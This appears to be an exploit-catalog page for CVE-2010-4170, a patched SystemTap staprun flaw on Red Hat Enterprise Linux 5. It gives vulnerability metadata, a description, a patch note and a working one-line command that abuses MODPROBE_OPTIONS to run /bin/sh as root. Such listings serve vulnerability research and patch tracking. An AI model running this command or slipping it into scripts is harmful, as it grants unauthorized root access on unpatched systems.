header-logo
Suggest Exploit
vendor:
Red Hat Enterprise Linux
by:
Red Hat
7,2
CVSS
HIGH
Local Privilege Escalation
264
CWE
Product Name: Red Hat Enterprise Linux
Affected Version From: Red Hat Enterprise Linux 5
Affected Version To: Red Hat Enterprise Linux 5
Patch Exists: YES
Related CWE: CVE-2010-4170
CPE: o:redhat:enterprise_linux:5
Metasploit: https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2010-4170/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0894/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0895/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2010

CVE-2010-4170

This exploit allows a local user to gain root privileges on a system running Red Hat Enterprise Linux 5. The exploit is based on a vulnerability in the SystemTap package, which allows a local user to execute arbitrary code with root privileges. The exploit works by creating a malicious SystemTap configuration file, which is then loaded by the staprun command. The malicious configuration file contains a printf command that will execute a shell script with root privileges.

Mitigation:

Red Hat has released a patch for this vulnerability.
Source

Exploit-DB raw data:

CVE-2010-4170

printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever


RHEL Advisory:
https://rhn.redhat.com/errata/RHSA-2010-0894.html

Navigation

Suggest Exploit

Services By CQR